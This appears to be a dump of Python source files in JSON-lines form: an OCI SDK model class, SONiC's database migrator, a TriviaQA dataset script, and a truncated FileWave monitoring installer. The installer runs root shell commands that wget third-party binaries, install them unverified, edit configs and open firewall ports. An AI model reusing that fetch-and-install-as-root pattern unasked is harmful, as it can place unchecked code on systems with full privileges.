UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance region Id.\n\n\n :return: The region_id of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._region_id\n\n @region_id.setter\n def region_id(self, region_id):\n \"\"\"\n Sets the region_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance region Id.\n\n\n :param region_id: The region_id of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._region_id = region_id\n\n @property\n def tenancy_id(self):\n \"\"\"\n Gets the tenancy_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance tenancy Id.\n\n\n :return: The tenancy_id of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._tenancy_id\n\n @tenancy_id.setter\n def tenancy_id(self, tenancy_id):\n \"\"\"\n Sets the tenancy_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance tenancy Id.\n\n\n :param tenancy_id: The tenancy_id of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._tenancy_id = tenancy_id\n\n @property\n def compartment_id(self):\n \"\"\"\n Gets the compartment_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance compartment Id.\n\n\n :return: The compartment_id of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._compartment_id\n\n @compartment_id.setter\n def compartment_id(self, compartment_id):\n \"\"\"\n Sets the compartment_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance compartment Id.\n\n\n :param compartment_id: The compartment_id of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._compartment_id = 
compartment_id\n\n @property\n def autonomous_db_id(self):\n \"\"\"\n Gets the autonomous_db_id of this UpdateDataAssetFromAtp.\n Tha Autonomous Database Id\n\n\n :return: The autonomous_db_id of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._autonomous_db_id\n\n @autonomous_db_id.setter\n def autonomous_db_id(self, autonomous_db_id):\n \"\"\"\n Sets the autonomous_db_id of this UpdateDataAssetFromAtp.\n Tha Autonomous Database Id\n\n\n :param autonomous_db_id: The autonomous_db_id of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._autonomous_db_id = autonomous_db_id\n\n @property\n def default_connection(self):\n \"\"\"\n Gets the default_connection of this UpdateDataAssetFromAtp.\n\n :return: The default_connection of this UpdateDataAssetFromAtp.\n :rtype: oci.data_integration.models.UpdateConnectionFromAtp\n \"\"\"\n return self._default_connection\n\n @default_connection.setter\n def default_connection(self, default_connection):\n \"\"\"\n Sets the default_connection of this UpdateDataAssetFromAtp.\n\n :param default_connection: The default_connection of this UpdateDataAssetFromAtp.\n :type: oci.data_integration.models.UpdateConnectionFromAtp\n \"\"\"\n self._default_connection = default_connection\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n"} {"ext": "py", "sha": "1a31404749354acdb2af34a31902f9dc5c7a0c8a", "content": "#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport sys\nimport traceback\nimport re\n\nfrom sonic_py_common import device_info, logger\nfrom swsscommon.swsscommon import SonicV2Connector, ConfigDBConnector, SonicDBConfig\n\nINIT_CFG_FILE = '/etc/sonic/init_cfg.json'\nSYSLOG_IDENTIFIER = 'db_migrator'\n\n\n# Global logger instance\nlog = logger.Logger(SYSLOG_IDENTIFIER)\n\n\nclass DBMigrator():\n def __init__(self, namespace, socket=None):\n \"\"\"\n Version string format:\n version_<major>_<minor>_<build>\n major: starting from 1, sequentially incrementing in master\n branch.\n minor: in github branches, minor version stays in 0. This minor\n version creates space for private branches derived from\n github public branches. 
These private branches shall use\n none-zero values.\n build: sequentially increase within a minor version domain.\n \"\"\"\n self.CURRENT_VERSION = 'version_2_0_0'\n\n self.TABLE_NAME = 'VERSIONS'\n self.TABLE_KEY = 'DATABASE'\n self.TABLE_FIELD = 'VERSION'\n\n db_kwargs = {}\n if socket:\n db_kwargs['unix_socket_path'] = socket\n\n if namespace is None:\n self.configDB = ConfigDBConnector(**db_kwargs)\n else:\n self.configDB = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace, **db_kwargs)\n self.configDB.db_connect('CONFIG_DB')\n\n self.appDB = SonicV2Connector(host='127.0.0.1')\n if self.appDB is not None:\n self.appDB.connect(self.appDB.APPL_DB)\n\n self.stateDB = SonicV2Connector(host='127.0.0.1')\n if self.stateDB is not None:\n self.stateDB.connect(self.stateDB.STATE_DB)\n\n version_info = device_info.get_sonic_version_info()\n asic_type = version_info.get('asic_type')\n self.asic_type = asic_type\n\n if asic_type == \"mellanox\":\n from mellanox_buffer_migrator import MellanoxBufferMigrator\n self.mellanox_buffer_migrator = MellanoxBufferMigrator(self.configDB)\n\n def migrate_pfc_wd_table(self):\n '''\n Migrate all data entries from table PFC_WD_TABLE to PFC_WD\n '''\n data = self.configDB.get_table('PFC_WD_TABLE')\n for key in data:\n self.configDB.set_entry('PFC_WD', key, data[key])\n self.configDB.delete_table('PFC_WD_TABLE')\n\n def is_ip_prefix_in_key(self, key):\n '''\n Function to check if IP address is present in the key. If it\n is present, then the key would be a tuple or else, it shall be\n be string\n '''\n return (isinstance(key, tuple))\n\n def migrate_interface_table(self):\n '''\n Migrate all data from existing INTERFACE table with IP Prefix\n to have an additional ONE entry without IP Prefix. For. e.g, for an entry\n \"Vlan1000|192.168.0.1/21\": {}\", this function shall add an entry without\n IP prefix as \"\"Vlan1000\": {}\". This is for VRF compatibility.\n '''\n if_db = []\n if_tables = {\n 'INTERFACE',\n 'PORTCHANNEL_INTERFACE',\n 'VLAN_INTERFACE',\n 'LOOPBACK_INTERFACE'\n }\n for table in if_tables:\n data = self.configDB.get_table(table)\n for key in data:\n if not self.is_ip_prefix_in_key(key):\n if_db.append(key)\n continue\n\n for table in if_tables:\n data = self.configDB.get_table(table)\n for key in data:\n if not self.is_ip_prefix_in_key(key) or key[0] in if_db:\n continue\n log.log_info('Migrating interface table for ' + key[0])\n self.configDB.set_entry(table, key[0], data[key])\n if_db.append(key[0])\n\n def migrate_intf_table(self):\n '''\n Migrate all data from existing INTF table in APP DB during warmboot with IP Prefix\n to have an additional ONE entry without IP Prefix. For. e.g, for an entry\n \"Vlan1000:192.168.0.1/21\": {}\", this function shall add an entry without\n IP prefix as \"\"Vlan1000\": {}\". 
This also migrates 'lo' to 'Loopback0' interface\n '''\n if self.appDB is None:\n return\n\n data = self.appDB.keys(self.appDB.APPL_DB, \"INTF_TABLE:*\")\n\n if data is None:\n return\n\n if_db = []\n for key in data:\n if_name = key.split(\":\")[1]\n if if_name == \"lo\":\n self.appDB.delete(self.appDB.APPL_DB, key)\n key = key.replace(if_name, \"Loopback0\")\n log.log_info('Migrating lo entry to ' + key)\n self.appDB.set(self.appDB.APPL_DB, key, 'NULL', 'NULL')\n\n if '/' not in key:\n if_db.append(key.split(\":\")[1])\n continue\n\n data = self.appDB.keys(self.appDB.APPL_DB, \"INTF_TABLE:*\")\n for key in data:\n if_name = key.split(\":\")[1]\n if if_name in if_db:\n continue\n log.log_info('Migrating intf table for ' + if_name)\n table = \"INTF_TABLE:\" + if_name\n self.appDB.set(self.appDB.APPL_DB, table, 'NULL', 'NULL')\n if_db.append(if_name)\n\n def migrate_copp_table(self):\n '''\n Delete the existing COPP table\n '''\n if self.appDB is None:\n return\n\n keys = self.appDB.keys(self.appDB.APPL_DB, \"COPP_TABLE:*\")\n if keys is None:\n return\n for copp_key in keys:\n self.appDB.delete(self.appDB.APPL_DB, copp_key)\n\n def migrate_config_db_buffer_tables_for_dynamic_calculation(self, speed_list, cable_len_list, default_dynamic_th, default_lossless_profiles, abandon_method, append_item_method):\n '''\n Migrate buffer tables to dynamic calculation mode\n parameters\n @speed_list - list of speed supported\n @cable_len_list - list of cable length supported\n @default_dynamic_th - default dynamic th\n @default_lossless_profiles - default lossless profiles from the previous image\n @abandon_method - a function which is called to abandon the migration and keep the current configuration\n if the current one doesn't match the default one\n @append_item_method - a function which is called to append an item to the list of pending commit items\n any update to buffer configuration will be pended and won't be applied until \n all configuration is checked and aligns with the default one\n\n 1. Buffer profiles for lossless PGs in BUFFER_PROFILE table will be removed\n if their names have the convention of pg_lossless_<speed>_<cable_length>_profile\n where the speed and cable_length belongs speed_list and cable_len_list respectively\n and the dynamic_th is equal to default_dynamic_th\n 2. Insert tables required for dynamic buffer calculation\n - DEFAULT_LOSSLESS_BUFFER_PARAMETER|AZURE: {'default_dynamic_th': default_dynamic_th}\n - LOSSLESS_TRAFFIC_PATTERN|AZURE: {'mtu': '1500', 'small_packet_percentage': '100'}\n 3. 
For lossless dynamic PGs, remove the explicit referencing buffer profiles\n Before: BUFFER_PG|<port>|3-4: {'profile': 'BUFFER_PROFILE|pg_lossless_<speed>_<cable_length>_profile'}\n After: BUFFER_PG|<port>|3-4: {'profile': 'NULL'}\n '''\n # Migrate BUFFER_PROFILEs, removing dynamically generated profiles\n dynamic_profile = self.configDB.get_table('BUFFER_PROFILE')\n profile_pattern = 'pg_lossless_([1-9][0-9]*000)_([1-9][0-9]*m)_profile'\n for name, info in dynamic_profile.items():\n m = re.search(profile_pattern, name)\n if not m:\n continue\n speed = m.group(1)\n cable_length = m.group(2)\n if speed in speed_list and cable_length in cable_len_list:\n log.log_info(\"current profile {} {}\".format(name, info))\n log.log_info(\"default profile {} {}\".format(name, default_lossless_profiles.get(name)))\n default_profile = default_lossless_profiles.get(name);\n if info.get(\"xon\") == default_profile.get(\"xon\") and info.get(\"size\") == default_profile.get(\"size\") and info.get('dynamic_th') == default_dynamic_th:\n append_item_method(('BUFFER_PROFILE', name, None))\n log.log_info(\"Lossless profile {} has been removed\".format(name))\n else:\n log.log_notice(\"Lossless profile {} doesn't match the default configuration, keep using traditional buffer calculation mode\")\n abandon_method()\n return True\n\n # Migrate BUFFER_PGs, removing the explicit designated profiles\n buffer_pgs = self.configDB.get_table('BUFFER_PG')\n ports = self.configDB.get_table('PORT')\n all_cable_lengths = self.configDB.get_table('CABLE_LENGTH')\n if not buffer_pgs or not ports or not all_cable_lengths:\n log.log_notice(\"At lease one of tables BUFFER_PG, PORT and CABLE_LENGTH hasn't been defined, skip following migration\")\n abandon_method()\n return True\n\n cable_lengths = all_cable_lengths[list(all_cable_lengths.keys())[0]]\n for name, profile in buffer_pgs.items():\n # do the db migration\n port, pg = name\n if pg != '3-4':\n continue\n try:\n profile_name = profile['profile'][1:-1].split('|')[1]\n m = re.search(profile_pattern, profile_name)\n except Exception:\n continue\n if not m:\n continue\n speed = m.group(1)\n cable_length = m.group(2)\n try:\n if speed == ports[port]['speed'] and cable_length == cable_lengths[port]:\n append_item_method(('BUFFER_PG', name, {'profile': 'NULL'}))\n else:\n log.log_notice(\"Lossless PG profile {} for port {} doesn't match its speed {} or cable length {}, keep using traditional buffer calculation mode\".format(\n profile_name, port, speed, cable_length))\n abandon_method()\n return True\n except Exception:\n continue\n\n # Insert other tables required for dynamic buffer calculation\n metadata = self.configDB.get_entry('DEVICE_METADATA', 'localhost')\n metadata['buffer_model'] = 'dynamic'\n append_item_method(('DEVICE_METADATA', 'localhost', metadata))\n append_item_method(('DEFAULT_LOSSLESS_BUFFER_PARAMETER', 'AZURE', {'default_dynamic_th': default_dynamic_th}))\n append_item_method(('LOSSLESS_TRAFFIC_PATTERN', 'AZURE', {'mtu': '1500', 'small_packet_percentage': '100'}))\n\n return True\n\n def prepare_dynamic_buffer_for_warm_reboot(self, buffer_pools = None, buffer_profiles = None, buffer_pgs = None):\n '''\n This is the very first warm reboot of buffermgrd (dynamic) if the system reboot from old image by warm-reboot\n In this case steps need to be taken to get buffermgrd prepared (for warm reboot)\n\n During warm reboot, buffer tables should be installed in the first place.\n However, it isn't able to achieve that when system is warm-rebooted from an old image\n 
without dynamic buffer supported, because the buffer info wasn't in the APPL_DB in the old image.\n The solution is to copy that info from CONFIG_DB into APPL_DB in db_migrator.\n During warm-reboot, db_migrator adjusts buffer info in CONFIG_DB by removing some fields\n according to requirement from dynamic buffer calculation.\n The buffer info before that adjustment needs to be copied to APPL_DB.\n\n 1. set WARM_RESTART_TABLE|buffermgrd as {restore_count: 0}\n 2. Copy the following tables from CONFIG_DB into APPL_DB in case of warm reboot\n The separator in fields that reference objects in other table needs to be updated from '|' to ':'\n - BUFFER_POOL\n - BUFFER_PROFILE, separator updated for field 'pool'\n - BUFFER_PG, separator updated for field 'profile'\n - BUFFER_QUEUE, separator updated for field 'profile\n - BUFFER_PORT_INGRESS_PROFILE_LIST, separator updated for field 'profile_list'\n - BUFFER_PORT_EGRESS_PROFILE_LIST, separator updated for field 'profile_list'\n\n '''\n warmreboot_state = self.stateDB.get(self.stateDB.STATE_DB, 'WARM_RESTART_ENABLE_TABLE|system', 'enable')\n mmu_size = self.stateDB.get(self.stateDB.STATE_DB, 'BUFFER_MAX_PARAM_TABLE|global', 'mmu_size')\n if warmreboot_state == 'true' and not mmu_size:\n log.log_notice(\"This is the very first run of buffermgrd (dynamic), prepare info required from warm reboot\")\n else:\n return True\n\n buffer_table_list = [\n ('BUFFER_POOL', buffer_pools, None),\n ('BUFFER_PROFILE', buffer_profiles, 'pool'),\n ('BUFFER_PG', buffer_pgs, 'profile'),\n ('BUFFER_QUEUE', None, 'profile'),\n ('BUFFER_PORT_INGRESS_PROFILE_LIST', None, 'profile_list'),\n ('BUFFER_PORT_EGRESS_PROFILE_LIST', None, 'profile_list')\n ]\n\n for pair in buffer_table_list:\n keys_copied = []\n keys_ignored = []\n table_name, entries, reference_field_name = pair\n app_table_name = table_name + \"_TABLE\"\n if not entries:\n entries = self.configDB.get_table(table_name)\n for key, items in entries.items():\n # copy items to appl db\n if reference_field_name:\n confdb_ref = items.get(reference_field_name)\n if not confdb_ref or confdb_ref == \"NULL\":\n keys_ignored.append(key)\n continue\n items_referenced = confdb_ref.split(',')\n appdb_ref = \"\"\n first_item = True\n for item in items_referenced:\n if first_item:\n first_item = False\n else:\n appdb_ref += ','\n subitems = item.split('|')\n first_key = True\n for subitem in subitems:\n if first_key:\n appdb_ref += subitem + '_TABLE'\n first_key = False\n else:\n appdb_ref += ':' + subitem\n\n items[reference_field_name] = appdb_ref\n keys_copied.append(key)\n if type(key) is tuple:\n appl_db_key = app_table_name + ':' + ':'.join(key)\n else:\n appl_db_key = app_table_name + ':' + key\n for field, data in items.items():\n self.appDB.set(self.appDB.APPL_DB, appl_db_key, field, data)\n\n if keys_copied:\n log.log_info(\"The following items in table {} in CONFIG_DB have been copied to APPL_DB: {}\".format(table_name, keys_copied))\n if keys_ignored:\n log.log_info(\"The following items in table {} in CONFIG_DB have been ignored: {}\".format(table_name, keys_copied))\n\n return True\n\n def version_unknown(self):\n \"\"\"\n version_unknown tracks all SONiC versions that doesn't have a version\n string defined in config_DB.\n Nothing can be assumped when migrating from this version to the next\n version.\n Any migration operation needs to test if the DB is in expected format\n before migrating date to the next version.\n \"\"\"\n\n log.log_info('Handling version_unknown')\n\n # NOTE: Uncomment next 3 lines of 
code when the migration code is in\n # place. Note that returning specific string is intentional,\n # here we only intended to migrade to DB version 1.0.1.\n # If new DB version is added in the future, the incremental\n # upgrade will take care of the subsequent migrations.\n self.migrate_pfc_wd_table()\n self.migrate_interface_table()\n self.migrate_intf_table()\n self.set_version('version_1_0_2')\n return 'version_1_0_2'\n\n def version_1_0_1(self):\n \"\"\"\n Version 1_0_1.\n \"\"\"\n log.log_info('Handling version_1_0_1')\n\n self.migrate_interface_table()\n self.migrate_intf_table()\n self.set_version('version_1_0_2')\n return 'version_1_0_2'\n\n def version_1_0_2(self):\n \"\"\"\n Version 1_0_2.\n \"\"\"\n log.log_info('Handling version_1_0_2')\n # Check ASIC type, if Mellanox platform then need DB migration\n if self.asic_type == \"mellanox\":\n if self.mellanox_buffer_migrator.mlnx_migrate_buffer_pool_size('version_1_0_2', 'version_1_0_3') \\\n and self.mellanox_buffer_migrator.mlnx_flush_new_buffer_configuration():\n self.set_version('version_1_0_3')\n else:\n self.set_version('version_1_0_3')\n return 'version_1_0_3'\n\n def version_1_0_3(self):\n \"\"\"\n Version 1_0_3.\n \"\"\"\n log.log_info('Handling version_1_0_3')\n\n # Check ASIC type, if Mellanox platform then need DB migration\n if self.asic_type == \"mellanox\":\n if self.mellanox_buffer_migrator.mlnx_migrate_buffer_pool_size('version_1_0_3', 'version_1_0_4') \\\n and self.mellanox_buffer_migrator.mlnx_migrate_buffer_profile('version_1_0_3', 'version_1_0_4') \\\n and self.mellanox_buffer_migrator.mlnx_flush_new_buffer_configuration():\n self.set_version('version_1_0_4')\n else:\n self.set_version('version_1_0_4')\n\n return 'version_1_0_4'\n\n def version_1_0_4(self):\n \"\"\"\n Current latest version. 
Nothing to do here.\n \"\"\"\n log.log_info('Handling version_1_0_4')\n\n # Check ASIC type, if Mellanox platform then need DB migration\n if self.asic_type == \"mellanox\":\n speed_list = self.mellanox_buffer_migrator.default_speed_list\n cable_len_list = self.mellanox_buffer_migrator.default_cable_len_list\n buffer_pools = self.configDB.get_table('BUFFER_POOL')\n buffer_profiles = self.configDB.get_table('BUFFER_PROFILE')\n buffer_pgs = self.configDB.get_table('BUFFER_PG')\n default_lossless_profiles = self.mellanox_buffer_migrator.mlnx_get_default_lossless_profile('version_1_0_4')\n abandon_method = self.mellanox_buffer_migrator.mlnx_abandon_pending_buffer_configuration\n append_method = self.mellanox_buffer_migrator.mlnx_append_item_on_pending_configuration_list\n\n if self.mellanox_buffer_migrator.mlnx_migrate_buffer_pool_size('version_1_0_4', 'version_2_0_0') \\\n and self.mellanox_buffer_migrator.mlnx_migrate_buffer_profile('version_1_0_4', 'version_2_0_0') \\\n and self.migrate_config_db_buffer_tables_for_dynamic_calculation(speed_list, cable_len_list, '0', default_lossless_profiles,\n abandon_method, append_method) \\\n and self.mellanox_buffer_migrator.mlnx_flush_new_buffer_configuration() \\\n and self.prepare_dynamic_buffer_for_warm_reboot(buffer_pools, buffer_profiles, buffer_pgs):\n metadata = self.configDB.get_entry('DEVICE_METADATA', 'localhost')\n if not metadata.get('buffer_model'):\n metadata['buffer_model'] = 'traditional'\n self.configDB.set_entry('DEVICE_METADATA', 'localhost', metadata)\n log.log_notice('Setting buffer_model to traditional')\n else:\n log.log_notice('Got buffer_model {}'.format(metadata.get('buffer_model')))\n\n self.set_version('version_2_0_0')\n else:\n self.prepare_dynamic_buffer_for_warm_reboot()\n\n metadata = self.configDB.get_entry('DEVICE_METADATA', 'localhost')\n metadata['buffer_model'] = 'traditional'\n self.configDB.set_entry('DEVICE_METADATA', 'localhost', metadata)\n log.log_notice('Setting buffer_model to traditional')\n\n self.set_version('version_2_0_0')\n\n return 'version_2_0_0'\n\n def version_2_0_0(self):\n \"\"\"\n Current latest version. 
Nothing to do here.\n \"\"\"\n log.log_info('Handling version_2_0_0')\n\n return None\n\n def get_version(self):\n version = self.configDB.get_entry(self.TABLE_NAME, self.TABLE_KEY)\n if version and version[self.TABLE_FIELD]:\n return version[self.TABLE_FIELD]\n\n return 'version_unknown'\n\n\n def set_version(self, version=None):\n if not version:\n version = self.CURRENT_VERSION\n log.log_info('Setting version to ' + version)\n entry = { self.TABLE_FIELD : version }\n self.configDB.set_entry(self.TABLE_NAME, self.TABLE_KEY, entry)\n\n\n def common_migration_ops(self):\n try:\n with open(INIT_CFG_FILE) as f:\n init_db = json.load(f)\n except Exception as e:\n raise Exception(str(e))\n\n for init_cfg_table, table_val in init_db.items():\n data = self.configDB.get_table(init_cfg_table)\n if data:\n # Ignore overriding the values that pre-exist in configDB\n continue\n log.log_info(\"Migrating table {} from INIT_CFG to config_db\".format(init_cfg_table))\n # Update all tables that do not exist in configDB but are present in INIT_CFG\n for init_table_key, init_table_val in table_val.items():\n self.configDB.set_entry(init_cfg_table, init_table_key, init_table_val)\n\n self.migrate_copp_table()\n\n def migrate(self):\n version = self.get_version()\n log.log_info('Upgrading from version ' + version)\n while version:\n next_version = getattr(self, version)()\n if next_version == version:\n raise Exception('Version migrate from %s stuck in same version' % version)\n version = next_version\n # Perform common migration ops\n self.common_migration_ops()\n\ndef main():\n try:\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-o',\n dest='operation',\n metavar='operation (migrate, set_version, get_version)',\n type = str,\n required = False,\n choices=['migrate', 'set_version', 'get_version'],\n help = 'operation to perform [default: get_version]',\n default='get_version')\n parser.add_argument('-s',\n dest='socket',\n metavar='unix socket',\n type = str,\n required = False,\n help = 'the unix socket that the desired database listens on',\n default = None )\n parser.add_argument('-n',\n dest='namespace',\n metavar='asic namespace',\n type = str,\n required = False,\n help = 'The asic namespace whose DB instance we need to connect',\n default = None )\n args = parser.parse_args()\n operation = args.operation\n socket_path = args.socket\n namespace = args.namespace\n\n if args.namespace is not None:\n SonicDBConfig.load_sonic_global_db_config(namespace=args.namespace)\n\n if socket_path:\n dbmgtr = DBMigrator(namespace, socket=socket_path)\n else:\n dbmgtr = DBMigrator(namespace)\n\n result = getattr(dbmgtr, operation)()\n if result:\n print(str(result))\n\n except Exception as e:\n log.log_error('Caught exception: ' + str(e))\n traceback.print_exc()\n print(str(e))\n parser.print_help()\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a3140c3dd840c57a081c358620998829408e123", "content": "# Copyright 2022 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Downloads and prepares TriviaQA dataset.\"\"\"\nfrom unittest import mock\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport apache_beam as beam\nimport tensorflow_datasets as tfds\n\nfrom official.projects.triviaqa import dataset # pylint: disable=unused-import\n\nflags.DEFINE_integer('sequence_length', 4096, 'Max number of tokens.')\n\nflags.DEFINE_integer(\n 'global_sequence_length', None,\n 'Max number of question tokens plus sentences. If not set, defaults to '\n 'sequence_length // 16 + 64.')\n\nflags.DEFINE_integer(\n 'stride', 3072,\n 'For documents longer than `sequence_length`, where to split them.')\n\nflags.DEFINE_string(\n 'sentencepiece_model_path', None,\n 'SentencePiece model to use for tokenization.')\n\nflags.DEFINE_string('data_dir', None, 'Data directory for TFDS.')\n\nflags.DEFINE_string('runner', 'DirectRunner', 'Beam runner to use.')\n\nFLAGS = flags.FLAGS\n\n\ndef main(argv):\n if len(argv) > 1:\n raise app.UsageError('Too many command-line arguments.')\n builder = tfds.builder(\n 'bigbird_trivia_qa/rc_wiki.preprocessed',\n data_dir=FLAGS.data_dir,\n sentencepiece_model_path=FLAGS.sentencepiece_model_path,\n sequence_length=FLAGS.sequence_length,\n global_sequence_length=FLAGS.global_sequence_length,\n stride=FLAGS.stride)\n download_config = tfds.download.DownloadConfig(\n beam_options=beam.options.pipeline_options.PipelineOptions(flags=[\n f'--runner={FLAGS.runner}',\n '--direct_num_workers=8',\n '--direct_running_mode=multi_processing',\n ]))\n with mock.patch('tensorflow_datasets.core.download.extractor._normpath',\n new=lambda x: x):\n builder.download_and_prepare(download_config=download_config)\n logging.info(builder.info.splits)\n\n\nif __name__ == '__main__':\n flags.mark_flag_as_required('sentencepiece_model_path')\n app.run(main)\n"} {"ext": "py", "sha": "1a3140d183ab009c8d4d030d35870b9d71da2093", "content": "\nimport os\nimport click\nimport shutil\nimport subprocess\nimport pkg_resources\nimport sys\nimport errno\nimport traceback\n\nfrom monitor.logs import init_logging, logger\n\nclass ValidationExceptionBinaryNotFound(Exception):\n pass\n\n\nclass NotRunningRoot(Exception):\n pass\n\n\n@click.group()\ndef cli():\n click.echo(\"FileWave Monitor v13 configuration.\")\n\n\ndelay_30m = 60 * 30\n\n\ndef run_root_command(cmd_array, **kwargs):\n try:\n os.rename('/etc/foo', '/etc/bar')\n except IOError as e:\n if (e == errno.EPERM):\n return False\n\n proc = subprocess.Popen(cmd_array, stdout=subprocess.PIPE, **kwargs)\n return proc.communicate()[0].decode('utf-8')\n\ndef run_root_commands(commands):\n for c in commands:\n run_root_command(c, shell=True)\n\ndef running_on_a_fwxserver_host(exist_func=os.path.exists):\n '''\n Check directories exist to see if we are running on a FileWave server host installation\n This should return True if we are, regardless of being Mac/Linux/Docker etc.\n '''\n dirs_that_must_exist = [\"bin\", \"certs\",\n 
\"django\", \"log\"]\n main_filewave_dir = os.path.join(\"/usr/local\", \"filewave\")\n if not exist_func(main_filewave_dir):\n return False\n for f in [os.path.join(main_filewave_dir, d) for d in dirs_that_must_exist]:\n if not exist_func(f):\n return False\n return True\n\n\n@cli.command('integrate', help=\"Integrates the module assuming you are running this on the FileWave Server\")\ndef install_into_environment():\n init_logging()\n\n if running_on_a_fwxserver_host():\n if run_root_command([\"ls\", \"-l\"]) is False:\n logger.info(\n \"provisioning is requested - but I've detected you are not running as root - aborting\")\n raise NotRunningRoot(\n \"provisioning is requested - but I've detected you are not running as root - aborting\")\n\n try:\n provision_postgres_wal_interval()\n provision_apache_mod_status()\n provision_prometheus_binary()\n provision_mtail_binary()\n provision_exporters()\n provision_supervisord_conf()\n validate_provisioning()\n\n logger.info(\"Looks like everything is configured, please restart the server now, then validate installation.\")\n\n except Exception as e:\n logger.error(\"Error during provisioning, are you using sudo?\")\n logger.error(e)\n traceback.print_exc(file=sys.stdout)\n return\n else:\n logger.info(\"Didn't detect a FileWave Server host - configuration aborted\")\n\ndef provision_postgres_wal_interval():\n # /usr/local/filewave/fwxserver/DB/pg_data/postgresql.conf\n # log_min_duration_statement = 200\n #\n cmds = [\n \"sed -i 's/log_min_duration_statement = 10000/log_min_duration_statement = 200/g' /usr/local/filewave/fwxserver/DB/pg_data/postgresql.conf\"\n ]\n\n return run_root_commands(cmds)\n\ndef provision_prometheus_binary():\n cmds = [\n \"wget https://github.com/prometheus/prometheus/releases/download/v2.19.2/prometheus-2.19.2.linux-amd64.tar.gz\",\n \"tar xzf prometheus-2.19.2.linux-amd64.tar.gz\",\n \"mkdir -p /usr/local/etc/filewave/prometheus\",\n \"mkdir -p /usr/local/etc/filewave/prometheus/conf.d/rules\",\n \"mkdir -p /usr/local/etc/filewave/prometheus/conf.d/alerts\",\n \"mkdir -p /usr/local/filewave/prometheus/\",\n \"mv prometheus-2.19.2.linux-amd64/prometheus /usr/local/sbin/\",\n \"mv prometheus-2.19.2.linux-amd64/promtool /usr/local/sbin/\",\n \"mv prometheus-2.19.2.linux-amd64/tsdb /usr/local/sbin/\",\n \"mv prometheus-2.19.2.linux-amd64/console_libraries /usr/local/filewave/prometheus/\",\n \"mv prometheus-2.19.2.linux-amd64/consoles /usr/local/filewave/prometheus/\",\n \"mkdir -p /usr/local/etc/filewave/prometheus/conf.d/jobs/http\",\n \"chown -R root:root /usr/local/filewave/prometheus/\",\n \"rm -rf prometheus-2.19.2.linux-amd64\"\n ]\n\n run_root_commands(cmds)\n\n prom_file = \"prometheus.yml\"\n data = pkg_resources.resource_string(\"monitor.config\", prom_file).decode('utf-8')\n provisioning_file = os.path.join(\"/usr/local/etc/filewave/prometheus\", prom_file)\n with open(provisioning_file, 'w') as f:\n f.write(data)\n shutil.chown(provisioning_file, user=\"root\", group=\"root\")\n shutil.chown(\"/usr/local/filewave/prometheus\", user=\"root\", group=\"root\")\n\ndef provision_apache_mod_status():\n '''\n #LoadModule status_module modules/mod_status.so\n\n # Uncomment following lines to enable mod status = and connect to https://localhost:20443/server-status?refresh=5 to see server status \n # Used by the prometheus apache_exporter. Works only on localhost (intentional to reduce security exposure). 
\n <IfModule status_module> \n <Location /server-status> \n SetHandler server-status \n Order Deny,Allow \n Deny from all \n Allow from 127.0.0.1 ::1 \n </Location> \n ExtendedStatus On \n </IfModule> \n '''\n cmds = [\n \"sed -i 's/#LoadModule status_module modules\\/mod_status\\.so/LoadModule status_module modules\\/mod_status\\.so/g' /usr/local/filewave/apache/conf/httpd.conf\"\n ]\n\n run_root_commands(cmds)\n\ndef provision_mtail_binary():\n logger.info(\"downloading mtail...\")\n\n # mtail binary: 15th Jul 2020\n # https://github.com/google/mtail/releases/download/v3.0.0-rc36/mtail_v3.0.0-rc36_linux_amd64\n cmds = [\n \"mkdir -p /usr/local/etc/filewave/mtail/progs\",\n \"chown -R root:root /usr/local/etc/filewave/mtail\",\n \"wget https://github.com/google/mtail/releases/download/v3.0.0-rc36/mtail_v3.0.0-rc36_linux_amd64\",\n \"cp mtail_v3.0.0-rc36_linux_amd64 /usr/local/sbin/mtail\",\n \"chmod +x /usr/local/sbin/mtail\",\n \"firewall-cmd --zone=public --add-port=21090/tcp --permanent\",\n \"firewall-cmd --reload\"\n ]\n\n run_root_commands(cmds)\n\n # write .mtail programs into /usr/local/etc/filewave/mtail/progs\n for mtail_file in pkg_resources.resource_listdir(\"monitor\", \"config\"):\n if mtail_file.endswith(\".mtail\"):\n logger.info(f\"writing with: {mtail_file}\")\n data = pkg_resources.resource_string(\"monitor.config\", mtail_file).decode('utf-8')\n provisioning_file = os.path.join(\"/usr/local/etc/filewave/mtail/progs\", mtail_file)\n with open(provisioning_file, 'w') as f:\n f.write(data)\n shutil.chown(provisioning_file, user=\"root\", group=\"root\")\n\ndef provision_exporters():\n logger.info(\"downloading postgres exporter...\")\n # from https://github.com/wrouesnel/postgres_exporter/releases/download/v0.8.0/postgres_exporter_v0.8.0_linux-amd64.tar.gz\n cmds = [\n \"wget 